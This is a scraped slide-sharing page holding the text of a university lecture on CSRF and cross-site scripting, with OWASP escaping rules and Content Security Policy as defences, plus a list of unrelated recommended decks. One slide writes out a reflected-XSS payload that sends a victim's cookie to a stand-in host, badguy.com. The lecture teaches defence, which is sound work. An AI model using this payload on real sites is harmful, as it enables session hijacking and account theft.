web security xss misleading users
play

Web Security: XSS, Misleading Users CS 161: Computer Security Prof. - PowerPoint PPT Presentation

Sep 07, 2022 •310 likes •1.07k views

Web Security: XSS, Misleading Users CS 161: Computer Security Prof. Vern Paxson TAs: Paul Bramsen, Apoorva Dornadula, David Fifield, Mia Gil Epner, David Hahn, Warren He, Grant Ho, Frank Li, Nathan Malkin, Mitar Milutinovic, Rishabh Poddar,

  1. Web Security: XSS, Misleading Users CS 161: Computer Security Prof. Vern Paxson TAs: Paul Bramsen, Apoorva Dornadula, David Fifield, Mia Gil Epner, David Hahn, Warren He, Grant Ho, Frank Li, Nathan Malkin, Mitar Milutinovic, Rishabh Poddar, Rebecca Portnoff, Nate Wang http://inst.eecs.berkeley.edu/~cs161 / February 9, 2017 Some content adapted from materials by Dan Boneh and John Mitchell

  2. CSRF Scenario Server Victim my bank.com n o i s s e s h s i l b a t s e 1 send forged request (w/ cookie) 4 5 Bank acts on request, 2 since it has valid visit server malicious page 3 cookie for user User Victim containing URL to my bank.com with bad Attack Server attacker.com cookie for actions my bank.com

  3. CSRF: Summary • Target: user who has some sort of account on a vulnerable server where requests from the user’s browser to the server have a predictable structure • Attacker goal: make requests to the server via the user’s browser that look to server like user intended to make them • Attacker tools: ability to get user to visit a web page under the attacker’s control • Key tricks: (1) requests to web server have predictable structure ; (2) use of <IMG SRC=…> or such to force victim’s browser to issue such a (predictable) request • Notes: (1) do not confuse with Cross-Site Scripting (XSS); (2) attack only requires HTML, no need for Javascript

  4. Stored XSS (Cross-Site Scripting) Attack Browser/Server a t a d e l b a u a l v l a e t s 6 evil.com 1 Inject malicious 2 request content User Victim script 3 receive malicious script 5 perform attacker action Server Patsy/Victim 4 includes authenticator cookie execute script (A “ stored ” embedded in input XSS attack) as though server meant us to run it mybank.com

  5. Stored XSS: Summary • Target: user with Javascript-enabled browser who visits user-generated-content page on vulnerable web service • Attacker goal: run script in user’s browser with same access as provided to server’s regular scripts (subvert SOP = Same Origin Policy ) • Attacker tools: ability to leave content on web server page (e.g., via an ordinary browser); optionally, a server used to receive stolen information such as cookies • Key trick: server fails to ensure that content uploaded to page does not contain embedded scripts • Notes: (1) do not confuse with Cross-Site Request Forgery (CSRF); (2) requires use of Javascript ( generally )

  6. Two Types of XSS (Cross-Site Scripting) • There are two main types of XSS attacks • In a stored (or “ persistent ” ) XSS attack, the attacker leaves their script lying around on mybank.com server – … and the server later unwittingly sends it to your browser – Your browser is none the wiser, and executes it within the same origin as the mybank.com server • In a reflected XSS attack, the attacker gets you to send the mybank.com server a URL that has a Javascript script crammed into it … – … and the server echoes it back to you in its response – Your browser is none the wiser, and executes the script in the response within the same origin as mybank.com

  7. Reflected XSS (Cross-Site Scripting) Victim client

  8. Reflected XSS (Cross-Site Scripting) Attack Server e t i s b e w t i s i v 1 evil.com Victim client

  9. Reflected XSS (Cross-Site Scripting) Attack Server e t i s b e w t i s i v 1 receive malicious page 2 evil.com Victim client

  10. Reflected XSS (Cross-Site Scripting) Attack Server e t i s b e w t i s i v 1 receive malicious page 2 evil.com Exact URL under attacker ’ s control 3 click on link Victim client Server Patsy/Victim mybank.com

  11. Reflected XSS (Cross-Site Scripting) Attack Server e t i s b e w t i s i v 1 receive malicious page 2 evil.com 3 click on link Victim client 4 echo user input Server Patsy/Victim mybank.com

  12. Reflected XSS (Cross-Site Scripting) Attack Server e t i s b e w t i s i v 1 receive malicious page 2 evil.com 3 click on link Victim client 4 echo user input 5 Server Patsy/Victim execute script embedded in input as though server meant us to run it mybank.com

  13. Reflected XSS (Cross-Site Scripting) Attack Server e t i s b e w t i s i v 1 receive malicious page 2 evil.com 3 click on link Victim client 4 echo user input 6 5 Server Patsy/Victim perform attacker action execute script embedded in input as though server meant us to run it mybank.com

  14. Reflected XSS (Cross-Site Scripting) Attack Server e t i s b e w t i s i v And/Or: 1 receive malicious page a t 2 a d e l b evil.com a u l a v d n e s 7 3 click on link Victim client 4 echo user input 5 Server Patsy/Victim execute script embedded in input as though server meant us to run it mybank.com

  15. Reflected XSS (Cross-Site Scripting) Attack Server e t i s b e w t i s i v 1 receive malicious page a t 2 a d e l b evil.com a u l a v d n e s 7 ( “ Reflected ” XSS attack) 3 click on link Victim client 4 echo user input 6 5 Server Patsy/Victim perform attacker action execute script embedded in input as though server meant us to run it mybank.com

  16. Example of How Reflected XSS Can Come About • User input is echoed into HTML response. • Example : search field – http://victim.com/search.php?term= apple – search.php responds with <HTML> <TITLE> Search Results </TITLE> <BODY> Results for $term : . . . </BODY> </HTML> How does an attacker who gets you to visit evil.com exploit this?

  17. Injection Via Script-in-URL • Consider this link on evil.com: (properly URL encoded) http://victim.com/search.php?term= <script> window.open( "http://badguy.com?cookie = " + document.cookie ) </script> What if user clicks on this link? 1) Browser goes to victim.com/search.php ? ... 2) victim.com returns <HTML> Results for <script> … </script> … 3) Browser executes script in same origin as victim.com Sends badguy.com cookie for victim.com

  18. Surely is not vulnerable to Reflected XSS, right?

  19. Reflected XSS: Summary • Target: user with Javascript-enabled browser who visits a vulnerable web service that will include parts of URLs it receives in the web page output it generates • Attacker goal: run script in user’s browser with same access as provided to server’s regular scripts (subvert SOP = Same Origin Policy ) • Attacker tools: ability to get user to click on a specially- crafted URL; optionally, a server used to receive stolen information such as cookies • Key trick: server fails to ensure that output it generates does not contain embedded scripts other than its own • Notes: (1) do not confuse with Cross-Site Request Forgery (CSRF); (2) requires use of Javascript ( generally )

  20. Defending Against XSS

  21. Protecting Servers Against XSS (OWASP) • OWASP = Open Web Application Security Project • Lots of guidelines, but 3 key ones cover most situations https://www.owasp.org/index.php/ XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet 1. Never insert untrusted data except in allowed locations 2. HTML-escape before inserting untrusted data into simple HTML element contents 3. HTML-escape all non-alphanumeric characters before inserting untrusted data into simple attribute contents

  22. Never Insert Untrusted Data Except In Allowed Locations

  23. HTML-Escape Before Inserting Untrusted Data into Simple HTML Element Contents “Simple”: <p>, <b>, <td> , … Rewrite 6 characters (or, better, use framework functionality ):

  24. HTML-Escape Before Inserting Untrusted Data into Simple HTML Element Contents Rewrite 6 characters (or, better, use framework functionality ): While this is a “default-allow” black-list , it’s one that’s been heavily community-vetted

  25. HTML-Escape All Non-Alphanumeric Characters Before Inserting Untrusted Data into Simple Attribute Contents “Simple”: width=, height=, value= … NOT : href=, style=, src=, on XXX = ... Escape using &#x HH ; where HH is hex ASCII code (or better, again, use framework support)

  26. Content Security Policy (CSP) • Goal: prevent XSS by specifying a white-list from where a browser can load resources (Javascript scripts, images, frames, … ) for a given web page • Approach: – Prohibits inline scripts – Content-Security-Policy HTTP header allows reply to specify white-list, instructs the browser to only execute or render resources from those sources • E.g., script-src 'self' http://b.com; img-src * – Relies on browser to enforce http://www.html5rocks.com/en/tutorials/security/content-security-policy/

Recommend

MODERN WEB SECURITY GRAD SEC SEP 21 2017 TODAYS PAPERS Misleading users Browser

MODERN WEB SECURITY GRAD SEC SEP 21 2017 TODAYS PAPERS Misleading users Browser

MODERN WEB SECURITY GRAD SEC SEP 21 2017 TODAYS PAPERS Misleading users Browser assumes that clicks and keystrokes = clear indication of what the user wants to do Constitutes part of the users trusted path Attacker can

619 views • 38 slides
SAP Security: Attacking SAP users Attacking SAP users with sapsploit eXtended 1.1 Xt d d 1 1

SAP Security: Attacking SAP users Attacking SAP users with sapsploit eXtended 1.1 Xt d d 1 1

SAP Security: Attacking SAP users Attacking SAP users with sapsploit eXtended 1.1 Xt d d 1 1 Alexander @sh2kerr Polyakov. PCI QSA,PA-QSA 11 We change look but we keep mind Company Digital Security Research Group International

924 views • 59 slides
Security Management Security in RiskView The Security functionality allows Users with Admin Group

Security Management Security in RiskView The Security functionality allows Users with Admin Group

Security Management Security in RiskView The Security functionality allows Users with Admin Group Permissions to: Setup and maintain the Users that can access the system Setup and maintain the Registers that separate the risk data into

336 views • 14 slides
Introduction to DB Security Secrecy: Users should not be able to see things they are not

Introduction to DB Security Secrecy: Users should not be able to see things they are not

Introduction to DB Security Secrecy: Users should not be able to see things they are not supposed to. Security E.g., A student cant see other students grades. Integrity: Users should not be able to modify things they are not

424 views • 3 slides
CS 4803 Computer and Network Security Servers Users How do users prove their identities when

CS 4803 Computer and Network Security Servers Users How do users prove their identities when

Many-to-Many Authentication ? CS 4803 Computer and Network Security Servers Users How do users prove their identities when requesting services from machines on the network? Alexandra (Sasha) Boldyreva Nave solution: every server knows

217 views • 5 slides
Security and Authorization [R&amp;G] Chapter 21 CS432 1 Introduction to DB Security

Security and Authorization [R&amp;G] Chapter 21 CS432 1 Introduction to DB Security

Security and Authorization [R&amp;G] Chapter 21 CS432 1 Introduction to DB Security Secrecy: Users should not be able to see things they are not supposed to. E.g., A student cant see other students grades. Integrity: Users

522 views • 8 slides
Experiences on how to p contact with end-users (policies and ISO security (policies and ISO

Experiences on how to p contact with end-users (policies and ISO security (policies and ISO

Experiences on how to p contact with end-users (policies and ISO security (policies and ISO security standards at campuses) p ) Brian OHora, BSc (Hons) &amp; MBA Technology Management Information Systems Services, TCD TERENA E2E

325 views • 15 slides
Database Security Enforced Database security - only authorized users can perform authorized

Database Security Enforced Database security - only authorized users can perform authorized

IT360: Applied Database Systems Database Security Kroenke: Ch 9, pg 309-314 PHP and MySQL: Ch 9, pg 217-227 1 Rights Database Security Enforced Database security - only authorized users can perform authorized activities Responsibilities

317 views • 9 slides
Crossing the Chasm Pitching Security Research to Mainstream Browser Vendors Collin Jackson

Crossing the Chasm Pitching Security Research to Mainstream Browser Vendors Collin Jackson

Crossing the Chasm Pitching Security Research to Mainstream Browser Vendors Collin Jackson Carnegie Mellon University Why a security feature is like a startup &lt;10 users ~1 million users &gt;1 billion users Ideas trying to cross the chasm

825 views • 46 slides
Cyber Security WCA - 2019 1 BILLION users Lets level set with some Defjnitions and

Cyber Security WCA - 2019 1 BILLION users Lets level set with some Defjnitions and

App Engine A Practical Approach To Cyber Security WCA - 2019 1 BILLION users Lets level set with some Defjnitions and Examples Protecting digital data and assets (a subset of information security) Confidentiality 1 Integrity 2

421 views • 21 slides
What is the SDF? Many of the top security researchers volunteer their time Research users

What is the SDF? Many of the top security researchers volunteer their time Research users

What is the SDF? Many of the top security researchers volunteer their time Research users include Facebook, Google, MS, Trend, Kaspersky, etc.. Update from ICANN .CR: Changed Paths Backend Data, DB, and API stable and actively

363 views • 9 slides
Io IoT T Security In Informatio ion sec securit ity Confidentiality Data accessed

Io IoT T Security In Informatio ion sec securit ity Confidentiality Data accessed

Security &amp; Knowledge Management a.a. 2019/20 Io IoT T Security In Informatio ion sec securit ity Confidentiality Data accessed just by permitted users Integrity Not tampered by not permitted users Availability

558 views • 21 slides
PROTECTING DIGITAL INFORMATION Roadmap: Fall 2018 But First, An Aside: This is Misleading

PROTECTING DIGITAL INFORMATION Roadmap: Fall 2018 But First, An Aside: This is Misleading

PROTECTING DIGITAL INFORMATION Roadmap: Fall 2018 But First, An Aside: This is Misleading This is More Like It Inside the Computer: Gates AND Gate 0 0 Input Wires 1 Output Wire 0's &amp; 1's represent low &amp; high voltage,

616 views • 59 slides
PROTECTING DIGITAL INFORMATION Roadmap: Fall 2017 But First, An Aside: This is Misleading

PROTECTING DIGITAL INFORMATION Roadmap: Fall 2017 But First, An Aside: This is Misleading

PROTECTING DIGITAL INFORMATION Roadmap: Fall 2017 But First, An Aside: This is Misleading This is More Like It Inside the Computer: Gates AND Gate 0 0 Input Wires 1 Output Wire 0's &amp; 1's represent low &amp; high voltage,

1.13k views • 59 slides
Chapter 9 Cloud Security Contents Security in an interconnected world, cloud security

Chapter 9 Cloud Security Contents Security in an interconnected world, cloud security

Chapter 9 Cloud Security Contents Security in an interconnected world, cloud security risks. Attacks in a cloud environment, top threats. Security, a major concern for cloud users. Privacy. Trust. Operating systems

661 views • 38 slides
Grid School Module 4: Grid Security 1 Typical Grid Scenario Resources Users 2 Requirements

Grid School Module 4: Grid Security 1 Typical Grid Scenario Resources Users 2 Requirements

Grid School Module 4: Grid Security 1 Typical Grid Scenario Resources Users 2 Requirements The users want to be able to communicate securely Three fundamental concepts (more on the following slides): Privacy - only invited to understand

484 views • 35 slides
Evolution and Thermodynamics Useful and Misleading Analogies Peter Schuster From Thermodynamics

Evolution and Thermodynamics Useful and Misleading Analogies Peter Schuster From Thermodynamics

Evolution and Thermodynamics Useful and Misleading Analogies Peter Schuster From Thermodynamics to Dynamical Systems Emmerich Wilhelms 60th Birthday Universitt Wien, 17.05.2002 Equilibrium thermodynamics is based on two major

689 views • 53 slides
Should the users be informed? Differences in risk perception between Android and iPhone users

Should the users be informed? Differences in risk perception between Android and iPhone users

Should the users be informed? Differences in risk perception between Android and iPhone users Workshop on Risk Perception at SOUPS 2013, Newcastle upon Tyne Zinaida Benenson, Lena Reinfelder IT Security Infrastructures University

566 views • 14 slides
Canadian Advertising and Competition Law: Compliance Strategies Avoiding Misleading Advertising

Canadian Advertising and Competition Law: Compliance Strategies Avoiding Misleading Advertising

Presenting a live 90-minute webinar with interactive Q&amp;A Canadian Advertising and Competition Law: Compliance Strategies Avoiding Misleading Advertising Violations Amid Increased Enforcement and New Rules TUESDAY, JANUARY 8, 2013 1pm

407 views • 37 slides
Analyzing End-Users Knowledge and Feelings Surrounding Smartphone Security and Privacy May

Analyzing End-Users Knowledge and Feelings Surrounding Smartphone Security and Privacy May

Analyzing End-Users Knowledge and Feelings Surrounding Smartphone Security and Privacy May 21st 2015 Lydia Kraus*, Tobias Fiebig*, Viktor Miruchna*, Sebastian Mller*, Asaf Shabtai+ * Technische Universitt Berlin + Ben-Gurion University

397 views • 18 slides
CSE 154 LECTURE 25: WEB SECURITY Our current view of security until now, we have assumed:

CSE 154 LECTURE 25: WEB SECURITY Our current view of security until now, we have assumed:

CSE 154 LECTURE 25: WEB SECURITY Our current view of security until now, we have assumed: valid user input non-malicious users nothing will ever go wrong this is unrealistic! The real world in order to write secure code,

445 views • 18 slides
CSE 154 LECTURE 26: WEB SECURITY Our current view of security until now, we have assumed:

CSE 154 LECTURE 26: WEB SECURITY Our current view of security until now, we have assumed:

CSE 154 LECTURE 26: WEB SECURITY Our current view of security until now, we have assumed: valid user input non-malicious users nothing will ever go wrong this is unrealistic! The real world in order to write secure code,

210 views • 18 slides
CSc 337 LECTURE 24: SECURITY Our current view of security until now, we have assumed:

CSc 337 LECTURE 24: SECURITY Our current view of security until now, we have assumed:

CSc 337 LECTURE 24: SECURITY Our current view of security until now, we have assumed: valid user input non-malicious users nothing will ever go wrong this is unrealistic! The real world in order to write secure code, we

211 views • 18 slides
Distributed File Systems Security: Anonymous access all files available to all users 14B.

Distributed File Systems Security: Anonymous access all files available to all users 14B.

6/6/2017 Distributed File Systems Security: Anonymous access all files available to all users 14B. Remote Data: Security no authentication required may be limited to read-only access 14C. Remote Data: Reliability &amp; Robustness

89 views • 8 slides

More recommend